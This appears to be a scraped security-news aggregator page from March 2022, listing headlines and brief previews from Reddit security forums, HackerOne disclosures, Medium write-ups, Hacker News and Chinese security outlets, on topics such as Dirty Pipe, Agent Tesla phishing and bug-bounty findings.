    译者:知道创宇404实验室翻译组 原文链接:https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla 自网络钓鱼出现以来,欺诈性的付费账单一直是最常见的诱惑之一。通常的操作方法包括迎合接受者避免债务的愿望,尤其是在可能牵涉到商业利益的情况。 FortiGuard ...
  • Open

    付费账单是假,Agent Tesla 攻击是真
    译者:知道创宇404实验室翻译组 原文链接:https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla 自网络钓鱼出现以来,欺诈性的付费账单一直是最常见的诱惑之一。通常的操作方法包括迎合接受者避免债务的愿望,尤其是在可能牵涉到商业利益的情况。 FortiGuard ...
    付费账单是假,Agent Tesla 攻击是真
    译者:知道创宇404实验室翻译组 原文链接:https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla 自网络钓鱼出现以来,欺诈性的付费账单一直是最常见的诱惑之一。通常的操作方法包括迎合接受者避免债务的愿望,尤其是在可能牵涉到商业利益的情况。 FortiGuard ...

  • Open

    Does connecting to a network via Ethernet have any extra security risks vs connecting via WiFi?
    As in, if someone has access to your network via Ethernet does it have any extra security risks to your system compared to if they were connected via WiFi? I'm thinking it depends on the type of internet your connection uses, eg fiber, cable, DSL,etc submitted by /u/computerstuffs [link] [comments]
    How do you stay motivated to learn and prevent burnout?
    I'm already in a somewhat senior engineering role so I'm not forced to learn for school or to get a better job. I always want to keep driving myself to learn new things and stay on the cutting edge of infosec in order to both be more knowledgeable in my current role but also for my own curiosity. Balancing this with a full time+ career as well as family and social obligations feels exhausting sometimes. What do you guys do to stay motivated? submitted by /u/Deliveranc3 [link] [comments]
    What are your favorite data visualizations and analytics?
    Be it for threat hunting or making sure everything's hunky dory, for reporting activity or predicting trends, what do you like to see graphed, and what insights does it give you? I'm looking for more tools for the toolbelt. submitted by /u/Outside-Log-2104 [link] [comments]
    How to open 120 GB SQL file than without my pc ?
    My SSD is low capacity, how to open ? submitted by /u/mefumetsub [link] [comments]
    What was running in the shell when I logged in to a compromised server?
    I have some old sites I run for friends and family on a shared small webhosting place that has a cPanel Linux server. I don't use cPanel for much and don't know all that much about it. I forgot about a WordPress site I was running and someone got it and was able to then compromise the cPanel login. Shame on me for letting a WordPress site sit vulnerable, I know. But it happens. They were then able to get into cPanel. So they loaded up a few WordPress sites with phishing site stuff, and also sent out some phishing emails, all pretty standard stuff I've seen before. Lots of base64 php files and other standard WP hack php stuff. Something I hadn't seen before happened when I SSHed into the server, and I'm not sure what it was or what they had running. I logged in and immediately saw an error that I don't exactly remember, but it was a normal looking error about "no shell", I couldn't do anything, it was just an empty shell. None of the standard commands worked. So I logged in, and something caught my session and had me in... I don't know what. I did ctrl-d or maybe ctrl-c and was back to the normal shell on that server. Things looked normal again. I wasn't even sure I was on the server at first, so I didn't capture the exact errors I was seeing before the return to normal. One thing that I did notice was the title of my session in iterm2 had changed to what looked like a list of files on the server with ^M in between the names. So, something like access-logs^M^application-backups^M^dbs^M^ and so on, all the root level directories. By the time I gave it any thought, I had already cleaned up most everything and killed a couple of running processes. Any idea what I got into when I logged in to there? submitted by /u/blakesterz [link] [comments]
    Can url/ip of microservice being requested by a server be found out?
    I currently have a Ruby on Rails server that does server-side rendering, and it calls one of my microservice. I have Basic Auth implemented for that microservice, but I wonder if it is possible for someone to found where is that microservice and the header/body of my request? Can that be safely prevented by HTTPS? submitted by /u/hksparrowboy [link] [comments]
    How to best visualise risk from vulnerability findings based off CVSS scores?
    We got a report for the vulnerabilities across a system. The findings showed around 40 high vulnerabilities, 150 medium vulnerabilities and 300 low vulnerabilities. The problem I have is how to visually get this across to management as I can make it a simple pie chart but because of the 300 low vulnerabilities dwarfing the 40 high vulnerabilities it doesn't come across particularly well. Does anyone have any ideas? Also we've created a calculation to plot the average score by using cumulative total of all CVSS scores divided by the number of findings and because there's so many low findings with low scores this is causing it to look better than it is as having around 40 high vulnerabilities isn't good. Does anyone have any sort of formulas or calculations I can use to get this risk score across better? Thanks submitted by /u/nimdroid [link] [comments]
    Tool to manage vulnerabilities from different sources?
    OK so the basics are that we're looking for a tool that we can use to group together and manage vulnerabilities found from multiple other sources/scanners (preferably open sorce) We're not looking for anything that will run its own scans; rather, manages already found reports... if that makes sense. At the moment, we're currently using an Excel spreadsheet to group everything together. If anyone has any suggestions that would be a life saver, thank you in advance. submitted by /u/Autumn-shadow [link] [comments]
    Sandvine technology for newbie
    Hello, My friend worked in Blueteam domain as Network security mostly on Firewalls, WAF, IPS etc. solutions. He lost his job earlier and saw an opening at Sandvine which he applied and got a call for interview but he is not sure what type of questions expected. Appreciate if anyone can advise what should he study and what type of questions to be expected and response. TIA submitted by /u/junostik [link] [comments]
    Conducting CMMC - NIST 800-171: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations at the company I work for
    Hey all, just started a job and I have to run some tests on use cases/artifacts/evidence scenarios. The company wants me to enter their IT Security Labs, and check items out of date such as routers, where firewalls are located, etc. There are 110 controls and I need to align a majority of the company's internal systems and processes with NIST 800-171 for CMMC. What is the best way to do this? submitted by /u/LordCommanderTaurusG [link] [comments]
  • Open

    GRAPHQL cross-tenant IDOR giving write access thought the operation UpdateAtlasApplicationPerson
    Stripe disclosed a bug submitted by bubbounty: https://hackerone.com/reports/1066203 - Bounty: $2500
    objectId in share location can be set to open arbitrary URL or Deeplinks
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1337178 - Bounty: $100
    PHP Info Exposing Secrets at https://radio.mtn.bj/info
    MTN Group disclosed a bug submitted by pudsec: https://hackerone.com/reports/1049402
  • Open

    Phonebook, the way to DoS a company
    I had to add my personal info to a phonebook, which I don’t like, so I took down the server ;) Continue reading on InfoSec Write-ups »
    My Pentest Log -9- (Open Redirect Vulnerability)
    Greetings from Kerkoporta to all, Continue reading on Medium »
    Gallery Tryhackme Walkthrough part-1
    File uploading attack Continue reading on Medium »
    Log4shell in google $1337.00
    Looking through the google cloud console for products “https://console.cloud.google.com” to look for bugs i came across VMware Engine. Continue reading on Medium »
    Full Account Takeover due to improper validation of old password
    Hello Hackers and Security community. I’m going to share how I’m able find the bug. Continue reading on Medium »
    ($$$) IDOR via GET Request which can SOLD all User Products
    Hi everyone, Continue reading on Medium »
    Blind-XSS Disappointment
    Blind XSS is a relatively easy bug to find with the availability of tools like XSS-Hunter and Burp collaborator. Continue reading on Medium »
    Misconfiguration OAuth Lead Account Takeover #Part 2
    Here are my bounty bug findings regarding Misconfiguration OAuth Lead Account takeover Part 2 Continue reading on Medium »
    How I managed to make a DDoS attack by exploiting a company’s service — Bug Bounty
    Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to tell you about an event that happened to me while I was… Continue reading on Medium »
    Account Enumeration Hacking Tool Created By Python For Finding Username Of Your Target Websits…
    Hi guys in this tutorial you will learn how to create python script for finding username of admin panel of target wordpress website and… Continue reading on Medium »
  • Open

    Reversing embedded device bootloader (U-Boot) - p.1 - Shielder
    submitted by /u/smaury [link] [comments]
    Put an io_uring on it: Exploiting the Linux Kernel
    submitted by /u/eberkut [link] [comments]
    DomainProactive: Security Monitoring for Internet Presence
    submitted by /u/genemcculley [link] [comments]
    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    submitted by /u/AlexForster [link] [comments]
    Three critical 0-days allow RCE and even physical ignition in APC UPS
    submitted by /u/Subterminal303 [link] [comments]
    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    submitted by /u/YuvalAvra [link] [comments]
    PreAuth RCE in Passcom Cloud Phone Systems found by Kerbit Security Firm.
    submitted by /u/nathanAbejeM [link] [comments]
  • Open

    Ukraine Invasion, Week 2 + more
    Welcome to the 3rd edition of the discursus Protest Analytics newsletter. Continue reading on discursus.io »
    Link Film Dokumenter Bellingcat — Truth in a Post-Truth World
    Sumbubotol.com, November 27, 2019 — Kabar gembira hari ini. Sumbubotol.com mengucapkan selamat kepada Submarine Amsterdam yang berhasil… Continue reading on Sumbu Botol »
  • Open

    BHI: The Newest Spectre Vulnerability Affecting Intel and Arm CPUs
    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=BHI-Spectre-Vulnerability Comments URL: https://news.ycombinator.com/item?id=30603762 Points: 5 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://slashdot.org Comments URL: https://news.ycombinator.com/item?id=30601465 Points: 1 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://arstechnica.com/information-technology/2022/03/linux-has-been-bitten-by-its-most-high-severity-vulnerability-in-years/ Comments URL: https://news.ycombinator.com/item?id=30596044 Points: 39 # Comments: 10
  • Open

    【安全通报】Linux DirtyPipe本地权限提升漏洞 (CVE-2022-...
    近日,网络上出现 Linux 下 DirtyPipe 本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权限。目...
  • Open

    【安全通报】Linux DirtyPipe本地权限提升漏洞 (CVE-2022-...
    近日,网络上出现 Linux 下 DirtyPipe 本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权限。目...
  • Open

    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    Article URL: https://blog.cloudflare.com/cve-2022-26143/ Comments URL: https://news.ycombinator.com/item?id=30602912 Points: 4 # Comments: 0
    Security advisory for the regex crate (CVE-2022-24713)
    Article URL: https://blog.rust-lang.org/2022/03/08/cve-2022-24713.html Comments URL: https://news.ycombinator.com/item?id=30600044 Points: 4 # Comments: 0
  • Open

    Extended Attributes and TCC on macOS
    This blogpost will describe how Transparency, Consent, and Control (TCC) affects extended attributes on macOS Continue reading on Medium »
  • Open

    What is life like as a female digital forensic investigator?
    I am just curious about how females go along in this field as I am currently doing a BSc in Business Management and Information systems and want to be a digital forensic investigator. submitted by /u/SkillKiller3010 [link] [comments]
    Internship Preparation Help for State Forensic Agency
    Hey everybody, I was lucky enough to be considered for a digital forensics internship position with my state's primary forensic agency. I've worked practice cases at my university using FTK and AXIOM, and I have research experience making a forensic image and working a case from beginning to end. Could anyone provide any tips to help me prepare for the interview? I have an incredible opportunity, and I want to make the most of it that I can. submitted by /u/Tuuin [link] [comments]
  • Open

    SecWiki News 2022-03-08 Review
    用户层下API的逆向分析及重构 by ourren 符号和解释 by ourren ROME改造计划 by ourren 记一次自建 Gitea + Drone 实例被挖矿的经历 by ourren 容器安全在野攻击调查 by ourren ATT&CK 在野数据分析 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-08 Review
    用户层下API的逆向分析及重构 by ourren 符号和解释 by ourren ROME改造计划 by ourren 记一次自建 Gitea + Drone 实例被挖矿的经历 by ourren 容器安全在野攻击调查 by ourren ATT&CK 在野数据分析 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Expanding the Hound: Introducing Plaintext Field to Compromised Accounts
    Introduction When doing an Internal Penetration Test, it is not uncommon to run BloodHound at one point or another. In case you are not familiar with BloodHound, it’s a tool that automatically fires off a bunch of LDAP queries and Windows API calls to collect various data in an Active Directory environment. Data can range... The post Expanding the Hound: Introducing Plaintext Field to Compromised Accounts appeared first on TrustedSec.
  • Open

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »
  • Open

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »
  • Open

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »
  • Open

    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    We disclosed several GKE Autopilot vulnerabilities and attack techniques to Google. The issues are now fixed – we provide a technical analysis. The post Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities appeared first on Unit42.
  • Open

    新一代银行木马SharkBot正通过Play Store传播
    SharkBot是一种银行木马,它能够绕过多因素身份验证机制窃取银行账户凭据。
    FreeBuf早报 | 谷歌要求撤销数据泄露诉讼案被驳回;英伟达泄露数据被用于病毒制作
    Alphabet股东起诉谷歌,由于谷歌故意隐瞒安全漏洞,导致用户私人数据泄露。2018年10月,有美国媒体报道称,该事件导致谷歌+近50万用户的个人数据泄露。
    全球黑客卷入乌俄乱局!数字网络战的背后值得深思
    这是数字时代首次爆发的,多个国家级黑客力量入局,且以国家为打击目标,破坏核心关键基础设施的全球级黑客网络战! 【导语】2月24日,乌克兰与俄罗斯之间
    容器安全在野攻击调查
    云原生安全相关的公司雨后春笋般建立起来,各个大云厂商也积极建立自己云原生的安全能力,保护云上客户的资产。
    速看! 2021-2022年23项重大网络犯罪统计数据
    自新冠疫情以来,网络犯罪一直呈上升趋势。专注网络安全的锐成信息在此搜集了2021年最值得注意的网络犯罪统计数据以及行业专家对2022年的互联网安全趋势预测。</
    3月9日相约CIS 2021春日版直播间,万元红包雨等你来抢!
    3月9-10日上午9点30分,锁定CIS2021 Spring·春日版官网,超棒的议题、超nice的有奖活动正等待着您。
    “以数据为中心”的数安实践感悟
    从传统的运营商、能源、医疗、金融等行业,到新兴的互联网行业,都掀起了数据安全建设的浪潮。
    白帽专访丨大家好,我是阿杨,一个全职挖洞的选手!
    「用梦想和勇气去创造,用信念和努力去证明。」 大家好,我是阿杨,自学渗透测试入门安全圈,目前是The loner安全团队的全职挖洞选手,擅长挖掘业务逻辑漏洞,并收获丰厚的奖金激励。
    Firefox再爆两个0Day漏洞,建议尽早升级
    近日,Mozilla对火狐(Firefox)网络浏览器进行了带外安全更新,其中包含了两个影响很大的安全漏洞。
    黑客组织入侵俄罗斯媒体,播放乌克兰战争画面
    俄罗斯媒体遭受网络攻击,出现乌克兰境内的战争画面。
    Metasploit本地使用指南
    在平时做项目的时候,每次开启虚拟机使用会很不方便,配置低的电脑后台开多了还会出现卡顿现象。主要还是在本地安装使用更加的方便快捷,提高了效率。也可以部署在vps等,方便对内网进行渗透。
    FBI:美国52个关键基础设施已被入侵
    截至2022年1月,FBI已经确定,在受攻击的10个关键基础设施中,至少有52个关键基础设施被入侵,涉及关键制造业、能源、金融服务、政府和信息技术领域等领域。
    三星证实黑客窃取了Galaxy设备源代码
    三星于周一证实了其网络遭到了黑客入侵,包括Galaxy手机的源代码在内的机密信息被窃取。
    Coinbase正封锁超25000个与俄罗斯有关的加密货币地址
    3月7日,流行的加密货币交易所 Coinbase宣布,正在封锁25000多个与俄罗斯自然人和实体相关的加密货币地址。
  • Open

    Movies from 1940 until last weekend! Busy site so starts slow(That’s what I’m blaming it on) lol
    submitted by /u/Yankeeslv [link] [comments]
  • Open

    Courtesy of Republic of Bulgaria! - Part Two
    An image is worth a thousand words.Related posts:Courtesy of Republic of Bulgaria!A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT AnalysisAn Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An AnalysisWhat You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the

  • Open

    Pentesting toolkit: all you need to know
    Red Teams use a comprehensive and complete toolkit to expose different platforms and get accurate results when reporting failures, data… Continue reading on Medium »
    Phishing Tools
    Phishing is one of the most serious threats in the digital world. Phishing makes people fool. Phishing email always looks like same as the… Continue reading on Medium »
  • Open

    Why do ISP ask for your SSN when signing up for their services?
    When I was singing up for spectrum they asked for my SSN, I gave to them since. How scared am I? submitted by /u/Empty-Ad1458 [link] [comments]
    What Windows based non Github program would allow me to brute force a TrueCrypt volume?
    Years ago I made some TrueCrypt volumes and forgot about them. I have now found them and forgotten some of the password. I know what the first half was and what some of the second half was but don't know where I put special characters or capital letters. I'm not good with git hub so is there a non-Github program that will let me enter the known parts, I can tell it to try every possible character in certain spaces, and only lower case and uppercase of certain letters i.e. m or M? submitted by /u/TerribleFruit [link] [comments]
    How to Fill My Knowledge Gaps as Quickly as Possible?
    I've been fascinated with cyber/net sec since I was a teenager who wanted to be a '1337 hax0r' (doesn't every nerdy teen wanna be one?). However, I went into Web Development. As I went I did have to learn about defensive coding techniques against SQL injection, path escalation, etc. I worked for financial, insurance and ISO270001 companies and thought I had a reasonable grasp of things since I'd done some sysadmin along the way installing Fail2Ban, Tripwire, etc. I even have the compact red, blue and purple team reference books and Parrot Sec on one partition I occasionally used to play with sec tools and have a Shodan account. I knew about Metasploit but had only done one tutorial. Fast forward to now: I need a career change after dev-burnout. I look into cyber sec and BOOM! Suddenly I see a ton of shit I've never seen before: SIEM? Mitre Att&ck? IoT Bots (have my ESP32 climate monitoring boards become an attack vector?!) TTPs? What on earth happened in the past few years that I missed? I barely recognise the industry anymore. I lifted my finger off the pulse for a few seconds and suddenly it's a different beast entirely. Can some kind soul point me to a good YouTube channel, guide, book, (free/cheap) course that will fill in the gaps I've missed the past few years? submitted by /u/adminsuckdonkeydick [link] [comments]
    Can exact ip addresses be spoofed?
    Recently noticed activity that I didn't really remember doing on an account, but it was from my exact ip address. I have a limited understanding of ip addresses, but spoofing a specific address isn't really possible, as you won't receive anything from the site you are trying to reach, correct? A proxy needs to be used, which is already a set "spoofed" ip, right? . submitted by /u/SaucyBoiTybalt [link] [comments]
    How do I Remove FireEye from a Host?
    Does anyone know where I can find instructions or documentation about removing FireEye from a host? Specifically what registry keys should be deleted? Does anyone have experience with this request? Thank you for taking a look! submitted by /u/ELcup [link] [comments]
    Cyberstalking & Hacking
    Hey r/AskNetsec, I'm getting hacked by two lecturers at my university. I know this and do not want to call the police as I have no evidence of them hacking me. I'm a student and have no money to pay for a digital forensics investigation to be done. How do I stop them from hacking me. They're hacking all my devices and families devices. They also are hacking my email account using a cookie stealer. I have no idea how to stop this and this has become cyberstalking. I'm a South African, I cannot contact the FBI or foreign charity organisations either. I don't want to involve the police since, all they have to do is stop hacking me, then I could get prosecuted for falsely accusing someone of committing a crime. Any advice or help with the situation would be appreciated. Best regards, Anon submitted by /u/Independent_Art_9954 [link] [comments]
    Ask for help, I think I was attacked by phishing
    A few days ago, I happened to see a message from Facebook. I went through the link without thinking and since then, I have since countless spam emails, and several times a day, I have been notified of membership registration and logout for sites that I do not need to log in at all the time. After that, I found out that something was wrong. Perhaps attacked by phishing. The Facebook site on the link I entered was a well-made site very similar to a normal site. In addition, there was no doubt at all because it was possible to log in, search, news articles, and content within the site. Banners, search windows, newsstand windows, login windows, and putters at the bottom were configured in a very similar way. And as a result, I had no choice but to renew all my personal contact information and e-mail addresses. I've only encountered the kind of writing to be careful of phishing sites, but I feel quite bad that I'm actually being attacked. Beyond feeling bad, it is creepy that other people view and use my personal information without permission. In order to prevent access to phishing sites and prevent personal information from being leaked, it is necessary to check if the domain is normal when receiving e-mails or text messages containing links. So I want to ask. What is a way to verify that it is a normal domain when receiving mail and text messages containing links? Is there a service or system that determines a link to a web page normal or dangerous when i enter suspicious link to search box? submitted by /u/Late_Ice_9288 [link] [comments]
    Introduction to Networks materials
    Hey Everyone, I have a new mentee who wants to learn networking. She is completely from a non IT background. Could you please suggest some good basic references/trainings that she can learn from. I know of some CCNA and Comptia instructors who start from quite basics but wanted to check if there is some other non certifications course that she can start with. submitted by /u/wackynerd14 [link] [comments]
    Potential DNS Attacks
    As this is a very hot topic, I'd like to prefix this with me saying I am trying to keep this 100% politics-free and strictly technology-related. That said, I read earlier today that there's a possibility of Russia forcing the use of their own DNS servers as of March 11: https://www.thetechoutlook.com/news/new-release/software-apps/breaking-news-russia-is-preparing-to-disconnect-from-the-global-internet I do not know the validity of the news itself, so I'm hoping to keep this strictly on the technical aspect in the case the order does happen. If we have vendors that hold offices in Russia and can access to our VPN (let's also assume we do not have control over our vendor's offices): could this new order introduce any additional risks to our network? Our VPN should deny all requests with an invalid SSL certificate, but does anyone think the order could introduce any additional risk of DNS attacks? (at least directly?) Assuming users do not ignore SSL warnings, would this be any more of a concern than usual? Thanks in advance! submitted by /u/HPCer [link] [comments]
  • Open

    GitHub - klezVirus/SysWhispers3: SysWhispers on Steroids - AV/EDR evasion via direct system calls.
    submitted by /u/dmchell [link] [comments]
    PROPHET SPIDER Exploits Citrix ShareFile Remote Code Execution Vulnerability CVE-2021-22941 to Deliver Webshell
    submitted by /u/dmchell [link] [comments]
  • Open

    Palined Google OD search went down
    submitted by /u/Raven_Claw7621 [link] [comments]
  • Open

    A new speed milestone for Chrome
    Everyday, billions of people around the world turn to Chrome to get things done quickly on their devices, whether shopping for a new pair of headphones or pulling together a sales report for work. Nothing is more frustrating than having a slow experience while browsing the web. That’s why Chrome has always been focused on building the fastest possible browser since its launch in 2008, without compromising on feature functionality or security. In our first The Fast and the Curious post of 2022, we are thrilled to celebrate how in the M99 release of Chrome we were able to substantially increase the speed of Chrome across all major platforms. We go deep on every platform where Chrome runs to provide the fastest possible experience. We’re excited to announce that in M99, Chrome on Mac has ach…
  • Open

    PHOTON
    (LET’S EXPLORE WEBSITE) Continue reading on Medium »
    Some critical vulnerabilities found with passive analysis on bug bounty programs explained
    This post describes three vulnerabilities found on paid bounty programs along with an overview about how it was found and the performed… Continue reading on InfoSec Write-ups »
    March OSINT Musings
    In light of the current events occurring in Ukraine now would be a good time to: Continue reading on Medium »
  • Open

    Critical cross-account vulnerability in Microsoft Azure automation service
    Article URL: https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30589845 Points: 213 # Comments: 41
    The Dirty Pipe Vulnerability
    Article URL: https://dirtypipe.cm4all.com/ Comments URL: https://news.ycombinator.com/item?id=30586740 Points: 673 # Comments: 232
  • Open

    Web Cache Poisoning leads to Stored XSS
    Glassdoor disclosed a bug submitted by bombon: https://hackerone.com/reports/1424094 - Bounty: $2000
  • Open

    SecWiki News 2022-03-07 Review
    优秀 ATT&CK 项目巡礼 by Avenger SecWiki周刊(第418期) by ourren 软件工程能力漫谈(视频 & PPT) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-07 Review
    优秀 ATT&CK 项目巡礼 by Avenger SecWiki周刊(第418期) by ourren 软件工程能力漫谈(视频 & PPT) by ourren 更多最新文章,请访问SecWiki
  • Open

    Web fuzzing tool written in python
    soon Continue reading on Medium »
  • Open

    Web fuzzing tool written in python
    soon Continue reading on Medium »
  • Open

    Critical Cross-Account Vulnerability Found in Microsoft Azure Automation Service
    submitted by /u/FoShizzleMyWeasle [link] [comments]
    The Dirty Pipe Vulnerability [CVE-2022-0847]
    submitted by /u/moviuro [link] [comments]
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport [link] [comments]
  • Open

    Computer Forensics and Investigation Project
    Hi Team, Need suggestions for any websites where I can find a reference scenario of a cybercrime where you have to do a computer forensics on a victims PC. For example a hacking incident, you have to verify of investigate how he/she was hacked. The report shall include the creation of a hypothetical scenario of a crime committed involving the said electronic device, as well as, a detailed description of the forensic examination, tools used, procedure, and findings, evidenced with the necessary screenshots and ensure all screenshots have the necessary verifiable names. This is a school project for my cybersecurity program and it is only my term 1. ​ Thank you so much! submitted by /u/bankshot15 [link] [comments]
    Avoid modifying the smartphone evidence
    To present forensic analysis in the court, we can't modify smarphone evidence, although i have put android phone in airplane mode, i still worry about modifying smartphone data during cellebrite ufed phone extraction, how to avoid tempate evidence during extraction? for linux image analysis, i can mount as read only, how about smartphone? submitted by /u/cyberfo [link] [comments]
    How do I get Laptop serial number from E01 image?
    Yep..someone fucked up the chain of custody forms submitted by /u/MasterBet [link] [comments]
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport [link] [comments]
    dns posioning or dns hijacking
    we encounter a lot of packages with small ttl in our pcap files, is this the symptom of DNS poisoning attack, or dns hijacking or other dns attack, like ddos? submitted by /u/cyberfo [link] [comments]
    how to detect C2 communication from log
    how to detect C2 communication from log, we have method to detect beaconing, but now has difficulty in detect Command and control command, we have no clue, anyone know how to detect it through splunk log? submitted by /u/cyberfo [link] [comments]
  • Open

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview
  • Open

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview
  • Open

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview
  • Open

    基于零信任的远程办公安全技术落地和应用
    基于零信任的远程办公安全方案,可以摆脱主机,轻松保证远程办公业务的连续性。
    工信部发布《车联网网络安全和数据安全标准体系建设指南》
    到2023年底,初步构建起车联网网络安全和数据安全标准体系;到2025年,形成较为完善的车联网网络安全和数据安全标准体系。
    揭秘APT36组织的CapraRat恶意软件
    我们会持续的介绍一些国际上臭名昭著APT组织,让我们更加了解和规避这些恶意的恶意软件。
    网络安全漏洞分析小结
    这里从漏洞点出发,分析漏洞,从中学习一些白盒挖掘漏洞的思路。
    CISA在其积极利用的漏洞目录中增加了95个新漏洞
    美国网络安全和基础设施安全局 (CISA) 本周在其利用漏洞目录中增加了95个新的安全漏洞,使其可利用的漏洞总数达到 478 个。
    都2022年了,密码管理器还安全吗?
    本文将重新审视密码管理器,为大家解答关于密码管理器的若干重要问题。

  • Open

    Telegram kanallarında arama yapmak için Google hacking’i kullanmak
    Telegram’da Putin yanlısı kanallar arıyordum, Google Dork’u kullanma. Bunun da Google hacking’i kullanmanın pratik bir örneği olduğunu… Continue reading on Medium »
    10 OSINT Tools Hackers Need to Know About
    Open source intelligence is a vital task for the red team and blue team alike. Here are some of the most useful OSINT tools. Continue reading on Medium »
    Send Google Alert To Slack
    Automatic Free Crawler By Google Continue reading on Medium »
    Final Recon — OSINT Tool for All-In-One Web Reconnaissance
    Final Recon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be… Continue reading on Medium »
  • Open

    help with making money
    Hey everyone I would like to join the security game. i have a background in programming, how computers and software works what is the fastest way to make money in the security field? I'm here not only for money i really like this field but i need to make money fast i have pills to pay and i can't get a job appreciate any help and guide submitted by /u/timet0fly [link] [comments]
    AlienVault OSSIM - Step by Step Tuning after Installation
    Hi there, I'm interested to test this SIEM for education purposes. I downloaded the latest version from the official site and installed it on my VMware. But I stumbled upon the fact that I do not fully understand how best to configure everything. I did not find any deep step-by-step documentation on the official portal. And most likely I can miss a lot through undetailed documentation. Do I understand correctly that Suricata works out of the box? I don't need to install an agent on a Windows host? When I installed HIDS on my Windows host, I had a lot of weird events where the destination IP is displayed - 0.0.0.0. And I don't even know how to make a rule, so these events are not reflected. I googled and other people had such problems and there is no solution. Who works a lot with this SIEM, perhaps from your experience, you could share recommendations on what to do, what to do after installing this SIEM. I also haven't fully figured out how to run FIM. submitted by /u/athanielx [link] [comments]
    Is it possible to be hacked by private networks/hidden SSIDS near your area?
    I believe my neighbors are watching me using private networks. I have have an app that shows hidden SSIDs. I think they are using these networks to see and listen to what I'm doing on my devices. submitted by /u/AshuraSenkuu [link] [comments]
    Potential drive-by 0-click 0-day on chrome
    There is an on going bug in chrome that allows attackers to download files in the background into the victims machine without triggering any gui updates, I first experienced this about two moths ago when I was trying to close the browser only to be interrupted by a chrome prompt informing me that there are ongoing downloads in the background that weren't started by me and display no sign of the downloading process on chrome's gui. I was a bit alarmed but I didn't pay it too much attention. Then I got curious when yesterday I had the same experience again, this time obviously I clicked 'continue downloads', I was taken to chrome download page where I found that chrome had intercepted and flagged a 'malicious file' and it was offering me to either 'keep' or 'discard' said file, regrettably …
  • Open

    Frelatage: A new Coverage-Based Python fuzzing library
    Hello everyone ! I am a 21 year old french cybersecurity enthusiast and I would like to share with you Frelatage, which is a tool I wrote ! It is a coverage-based Python fuzzing library which can be used to fuzz python code. The development of Frelatage was inspired by various other fuzzers, including AFL/AFL++, Atheris and PyFuzzer.The main purpose of the project is to take advantage of the best features of these fuzzers and gather them together into a new tool in order to efficiently fuzz python applications. Please note that the project is still in early alpha, and its development is very active, so any advice or suggestion is welcomed ! Install: https://github.com/Rog3rSm1th/Frelatage https://i.redd.it/m88potyk9tl81.gif submitted by /u/FrenchFuzzer [link] [comments]
    Shellcode Buff Overflow Question
